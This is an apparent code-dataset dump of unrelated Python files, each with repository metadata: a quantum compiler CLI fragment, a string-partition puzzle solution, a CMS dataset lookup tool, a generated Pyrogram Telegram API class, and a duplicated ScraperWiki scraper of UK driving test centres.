    parser.add_argument('--out_dir', nargs='?', default='test_output', help='Folder name to store the compilation')
    parser.add_argument('--measurement', nargs='?', default=True, help='Add measurement to all the qubits in the end of the algorithm')
    args = parser.parse_args()
    try:
        circuit(args.config_file, args.new_scheduler, args.scheduler, args.uniform_sched, args.sched_commute, args.mapper, args.moves, args.maptiebreak, args.initial_placement, args.out_dir)
    except TypeError:
        # Missing gate definitions are reported as a soft warning, then the
        # original exception is re-raised for the caller.
        print('\nCompiled, but some gate is not defined in the configuration file. \nThe gate will be invoked like it is.')
        raise
"alxmorais8@msn.com"
] | alxmorais8@msn.com |
5871936defe13c8c76a1e5180211aed6b730fb84 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02939/s874669540.py | a4a0e29c427f34abd6e8938f8a85118db21cf80c | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 211 | py | s = str(input())
S = []
temp = ''
for c in s:
temp += c
if S:
if S[-1] != temp:
S.append(temp)
temp = ''
else:
S.append(temp)
temp = ''
print(len(S))
| [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
50413ba7b2f7b0d8c96b23ca8c6e6550f4a489e3 | 259453140d6b563fc0c280f0922601a54a2cb2c2 | /CMGTools/Production/scripts/dataset.py | 1f44ad56b3e945725420679cfd494be56a9a079b | [] | no_license | wangmengmeng/WHAnalysisPackage | f56b4a128f50801409828ca38d0f26e199201dd8 | 7eb1bf3b4e77579c4362396ca5e594bc93a41f2b | refs/heads/master | 2021-01-17T14:31:11.701436 | 2014-06-05T16:07:38 | 2014-06-05T16:07:38 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,653 | py | #!/usr/bin/env python
import os
import fnmatch
from CMGTools.Production.dataset import createDataset
if __name__ == '__main__':
    import sys
    from optparse import OptionParser
    import pprint

    parser = OptionParser()
    parser.usage = "%prog [options] <dataset>\nPrints information on a sample."
    # Fix: user-facing help typo "wilfcard" -> "wildcard".
    parser.add_option("-w", "--wildcard", dest="wildcard", default='tree*root',
                      help='A UNIX style wildcard for root file printout')
    parser.add_option("-u", "--user", dest="user", default=os.environ.get('USER', None),
                      help='user owning the dataset.\nInstead of the username, give "LOCAL" to read datasets in a standard unix filesystem, and "CMS" to read official CMS datasets present at CERN.')
    parser.add_option("-b", "--basedir", dest="basedir", default=os.environ.get('CMGLOCALBASEDIR', None),
                      help='in case -u LOCAL is specified, this option allows to specify the local base directory containing the dataset. default is CMGLOCALBASEDIR')
    parser.add_option("-a", "--abspath", dest="abspath",
                      action='store_true',
                      default=False,
                      help='print absolute path')
    parser.add_option("-n", "--noinfo", dest="noinfo",
                      action='store_true',
                      default=False,
                      help='do not print additional info (file size and status)')
    parser.add_option("-r", "--report", dest="report",
                      action='store_true',
                      default=False,
                      help='Print edmIntegrityCheck report')
    parser.add_option("-c", "--readcache", dest="readcache",
                      action='store_true',
                      default=False,
                      help='Read from the cache.')
    parser.add_option("--min-run", dest="min_run", default=-1, type=int,
                      help='When querying DBS, require runs >= than this run')
    parser.add_option("--max-run", dest="max_run", default=-1, type=int,
                      help='When querying DBS, require runs <= than this run')
    (options, args) = parser.parse_args()
    # Exactly one dataset name must be given on the command line.
    if len(args) != 1:
        parser.print_help()
        sys.exit(1)
    user = options.user
    name = args[0]
    info = not options.noinfo
    run_range = (options.min_run, options.max_run)
    # Build the dataset object, then print its summary and file list.
    data = createDataset(user, name,
                         fnmatch.translate(options.wildcard),
                         options.readcache,
                         options.basedir,
                         run_range=run_range)
    data.printInfo()
    data.printFiles(abspath=options.abspath,
                    info=info)
    if options.report:
        pprint.pprint(data.report)
| [
"mengmeng.wang@cern.ch"
] | mengmeng.wang@cern.ch |
69dbcf71f1bbf8f6d7c05e580c0952e58ee38dca | 8760766a314dc1cb126b235cd2528fd39963a5bf | /database_ui/venv/Lib/site-packages/pyrogram/raw/functions/stats/get_megagroup_stats.py | 5e001bdde3d2ddacb375aef3400530946f88538d | [] | no_license | sunliangjun/database_demo | bb3eeaf0523e35f1b5c2c4d80ee68197f6e60715 | f7a1edc9a0eb9ce56ec76c5be67bbcbd66e45666 | refs/heads/main | 2023-01-02T19:43:16.874831 | 2020-10-22T13:06:20 | 2020-10-22T13:13:10 | 306,046,785 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,540 | py | # Pyrogram - Telegram MTProto API Client Library for Python
# Copyright (C) 2017-2020 Dan <https://github.com/delivrance>
#
# This file is part of Pyrogram.
#
# Pyrogram is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Pyrogram is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with Pyrogram. If not, see <http://www.gnu.org/licenses/>.
from io import BytesIO
from pyrogram.raw.core.primitives import Int, Long, Int128, Int256, Bool, Bytes, String, Double, Vector
from pyrogram.raw.core import TLObject
from pyrogram import raw
from typing import List, Union, Any
# # # # # # # # # # # # # # # # # # # # # # # #
# !!! WARNING !!! #
# This is a generated file! #
# All changes made in this file will be lost! #
# # # # # # # # # # # # # # # # # # # # # # # #
class GetMegagroupStats(TLObject):  # type: ignore
    """Telegram API method.
    Details:
        - Layer: ``117``
        - ID: ``0xdcdf8607``
    Parameters:
        channel: :obj:`InputChannel <pyrogram.raw.base.InputChannel>`
        dark (optional): ``bool``
    Returns:
        :obj:`stats.MegagroupStats <pyrogram.raw.base.stats.MegagroupStats>`
    """
    __slots__: List[str] = ["channel", "dark"]
    ID = 0xdcdf8607
    QUALNAME = "functions.stats.GetMegagroupStats"
    def __init__(self, *, channel: "raw.base.InputChannel", dark: Union[None, bool] = None) -> None:
        self.channel = channel  # InputChannel
        self.dark = dark  # flags.0?true
    @staticmethod
    def read(data: BytesIO, *args: Any) -> "GetMegagroupStats":
        """Deserialize a GetMegagroupStats payload from *data*."""
        # The first int is the flags bitfield; bit 0 carries the optional
        # `dark` boolean (flags.0?true encoding).
        flags = Int.read(data)
        dark = True if flags & (1 << 0) else False
        channel = TLObject.read(data)
        return GetMegagroupStats(channel=channel, dark=dark)
    def write(self) -> bytes:
        """Serialize this object to its TL binary representation."""
        data = BytesIO()
        # Constructor ID first; the False argument presumably selects the
        # unsigned encoding — confirm against Int's definition.
        data.write(Int(self.ID, False))
        flags = 0
        # Bit 0 is set whenever `dark` was provided.
        flags |= (1 << 0) if self.dark is not None else 0
        data.write(Int(flags))
        data.write(self.channel.write())
        return data.getvalue()
| [
"582675682@qq.com"
] | 582675682@qq.com |
5af08f0235d4499b872253caf77b8dd5584d4afe | 3d19e1a316de4d6d96471c64332fff7acfaf1308 | /Users/A/alphagov/uk_dvla_practical_test_centres_1.py | 05a90b7771facbdbc2cd97a7e16b55bc915f0fad | [] | no_license | BerilBBJ/scraperwiki-scraper-vault | 4e98837ac3b1cc3a3edb01b8954ed00f341c8fcc | 65ea6a943cc348a9caf3782b900b36446f7e137d | refs/heads/master | 2021-12-02T23:55:58.481210 | 2013-09-30T17:02:59 | 2013-09-30T17:02:59 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,646 | py | # http://www.dft.gov.uk/dsa/AtoZservices_Bannered.asp?Cat=-1&TestType=car&TypeID=17
# http://www.dft.gov.uk/dsa/AtoZservices_Bannered.asp?letter=G&CAT=-1&s=&TypeID=17&TestType=car
import scraperwiki
import re
import time
from BeautifulSoup import BeautifulSoup, Tag
def a_to_z(url):
    """Yield *url* with its surviving %s placeholder filled with each
    capital letter A through Z (26 URLs in total)."""
    for code in range(ord('A'), ord('Z') + 1):
        yield url % chr(code)
def absolute(url):
    """Prefix a site-relative *url* with the DSA site base, producing an
    absolute URL. Any %s in *url* is left untouched for later substitution."""
    base = "http://www.dft.gov.uk/dsa/"
    return base + url
index_urls = a_to_z(absolute("AtoZservices_Bannered.asp?letter=%s&CAT=-1&s=&TypeID=17&TestType="))
def first(gen):
    """Yield only the first item of *gen*, or nothing for an empty iterable.

    Used via ``process = first`` to limit a scrape run to a single item
    when debugging.
    """
    iterator = iter(gen)
    try:
        head = next(iterator)
    except StopIteration:
        return
    yield head
# NOTE(review): this generator shadows the builtin all() for the rest of
# the module; kept as-is because `process = all` below depends on the name.
def all(gen):
    # Pass every item through unchanged (the "process everything" strategy).
    for a in gen:
        yield a
def scrape(url):
    # Fetch a page through ScraperWiki, then sleep 2s to rate-limit
    # requests against the DSA site.
    html = scraperwiki.scrape(url)
    time.sleep(2)
    return html
process = all
def soup_strip_html_preserve_brs(st):
    # Flatten a BeautifulSoup node to plain text, turning <br> tags into
    # newlines and dropping all other markup. Returns '' for a None node.
    # (isinstance(e, unicode) confirms this is Python 2 code.)
    if st is None:
        return ''
    def munge(e):
        # Text nodes are stripped; <br> becomes '\n'; other tags contribute
        # nothing themselves (their text children are visited separately).
        if isinstance(e,unicode):
            return e.strip()
        elif isinstance(e,Tag) and e.name == "br":
            return "\n"
        else:
            return ""
    # NOTE(review): the first replace() argument renders as a plain space —
    # presumably it was a non-breaking space originally; confirm upstream.
    return ''.join([ munge(e) for e in st.recursiveChildGenerator()]).replace(" "," ").strip("\n").strip()
# Collected (relative URL, centre name) pairs discovered on the index pages.
center_urls = set()
# Pass 1: walk the A-Z index pages and harvest links to individual
# test-centre detail pages.
for url in process(index_urls):
    html = scrape(url)
    soup = BeautifulSoup(html)
    links = soup.findAll('a',attrs = {"href": re.compile("^AddressDetails_Bannered.asp")})
    for link in links:
        url = link["href"]
        name = link.text
        center_urls.add((url,name))
# Pass 2: scrape each detail page and store one record per centre.
# NOTE(review): the `<>` operator below is Python 2-only syntax.
for url,p_title in process(center_urls):
    html = scrape(absolute(url))
    soup = BeautifulSoup(html)
    title = soup.find('h3')
    if title.text <> "":
        addressNode = title.findNextSibling("p")
        center_name = title.text
        address = soup_strip_html_preserve_brs(addressNode)
        # Last line of the address block is presumably the postcode; relies
        # on soup_strip_html_preserve_brs keeping <br> line breaks.
        postcode = address.split("\n")[-1]
        # Returns the next non-empty <h3> sibling, or None.
        def has_details_node():
            next_h3 = addressNode.findNextSibling("h3")
            if next_h3 is None:
                return None
            elif next_h3.text == "":
                return None
            else:
                return next_h3
        # A line describes a test type when it looks like "<known type>: ...".
        def is_test_type(line):
            return ":" in line and line.split(":")[0] in ["Car","Motorcycle Module 2","Motorcycle Module 1","Taxi","Vocational"]
        if has_details_node():
            detailsNode = addressNode.findNextSibling("p")
            additional_details = soup_strip_html_preserve_brs(detailsNode)
            testsNode = detailsNode.findNextSibling("p").findNextSibling("p")
        else:
            additional_details = ""
            testsNode = addressNode.findNextSibling("p").findNextSibling("p")
        # Two page layouts are handled: <strong> labels per test type, or a
        # plain colon-separated text list.
        if addressNode.findNextSibling("strong"):
            additional_details = None
            startNode = addressNode
            test_types = []
            while True:
                testNode = startNode.findNextSibling("strong")
                if testNode is None:
                    break
                test = testNode.text.strip(" :")
                details = testNode.nextSibling.replace(" "," ").replace(": ","").strip()
                test_types.append([test,details])
                startNode = testNode.nextSibling
        else:
            tests = soup_strip_html_preserve_brs(testsNode)
            test_types = [line.split(":") for line in tests.split("\n") if is_test_type(line)]
        data = {
            "url": url,
            "title": p_title,
            "center_name": center_name,
            "address": address,
            "postcode": postcode,
            "additional_details": additional_details,
            "on_offer": ",".join([t[0] for t in test_types])
        }
        # One extra column per offered test type, e.g. "car_avail".
        for t in test_types:
            data[t[0].lower()+"_avail"] = t[1]
        scraperwiki.datastore.save(unique_keys=['url'], data= data)
# NOTE(review): everything from here to the end of the file is an exact
# duplicate of the script above (a ScraperWiki paste artifact); running this
# module redefines every helper and performs the whole scrape a second
# time. Consider deleting this copy.
# http://www.dft.gov.uk/dsa/AtoZservices_Bannered.asp?Cat=-1&TestType=car&TypeID=17
# http://www.dft.gov.uk/dsa/AtoZservices_Bannered.asp?letter=G&CAT=-1&s=&TypeID=17&TestType=car
import scraperwiki
import re
import time
from BeautifulSoup import BeautifulSoup, Tag
def a_to_z(url):
    letters = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
    for letter in letters:
        yield url % letter
def absolute(url):
    return "http://www.dft.gov.uk/dsa/%s" % url
index_urls = a_to_z(absolute("AtoZservices_Bannered.asp?letter=%s&CAT=-1&s=&TypeID=17&TestType="))
def first(gen):
    for a in gen:
        yield a
        return
def all(gen):
    for a in gen:
        yield a
def scrape(url):
    html = scraperwiki.scrape(url)
    time.sleep(2)
    return html
process = all
def soup_strip_html_preserve_brs(st):
    if st is None:
        return ''
    def munge(e):
        if isinstance(e,unicode):
            return e.strip()
        elif isinstance(e,Tag) and e.name == "br":
            return "\n"
        else:
            return ""
    return ''.join([ munge(e) for e in st.recursiveChildGenerator()]).replace(" "," ").strip("\n").strip()
center_urls = set()
for url in process(index_urls):
    html = scrape(url)
    soup = BeautifulSoup(html)
    links = soup.findAll('a',attrs = {"href": re.compile("^AddressDetails_Bannered.asp")})
    for link in links:
        url = link["href"]
        name = link.text
        center_urls.add((url,name))
for url,p_title in process(center_urls):
    html = scrape(absolute(url))
    soup = BeautifulSoup(html)
    title = soup.find('h3')
    if title.text <> "":
        addressNode = title.findNextSibling("p")
        center_name = title.text
        address = soup_strip_html_preserve_brs(addressNode)
        postcode = address.split("\n")[-1]
        def has_details_node():
            next_h3 = addressNode.findNextSibling("h3")
            if next_h3 is None:
                return None
            elif next_h3.text == "":
                return None
            else:
                return next_h3
        def is_test_type(line):
            return ":" in line and line.split(":")[0] in ["Car","Motorcycle Module 2","Motorcycle Module 1","Taxi","Vocational"]
        if has_details_node():
            detailsNode = addressNode.findNextSibling("p")
            additional_details = soup_strip_html_preserve_brs(detailsNode)
            testsNode = detailsNode.findNextSibling("p").findNextSibling("p")
        else:
            additional_details = ""
            testsNode = addressNode.findNextSibling("p").findNextSibling("p")
        if addressNode.findNextSibling("strong"):
            additional_details = None
            startNode = addressNode
            test_types = []
            while True:
                testNode = startNode.findNextSibling("strong")
                if testNode is None:
                    break
                test = testNode.text.strip(" :")
                details = testNode.nextSibling.replace(" "," ").replace(": ","").strip()
                test_types.append([test,details])
                startNode = testNode.nextSibling
        else:
            tests = soup_strip_html_preserve_brs(testsNode)
            test_types = [line.split(":") for line in tests.split("\n") if is_test_type(line)]
        data = {
            "url": url,
            "title": p_title,
            "center_name": center_name,
            "address": address,
            "postcode": postcode,
            "additional_details": additional_details,
            "on_offer": ",".join([t[0] for t in test_types])
        }
        for t in test_types:
            data[t[0].lower()+"_avail"] = t[1]
        scraperwiki.datastore.save(unique_keys=['url'], data= data)
| [
"pallih@kaninka.net"
] | pallih@kaninka.net |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.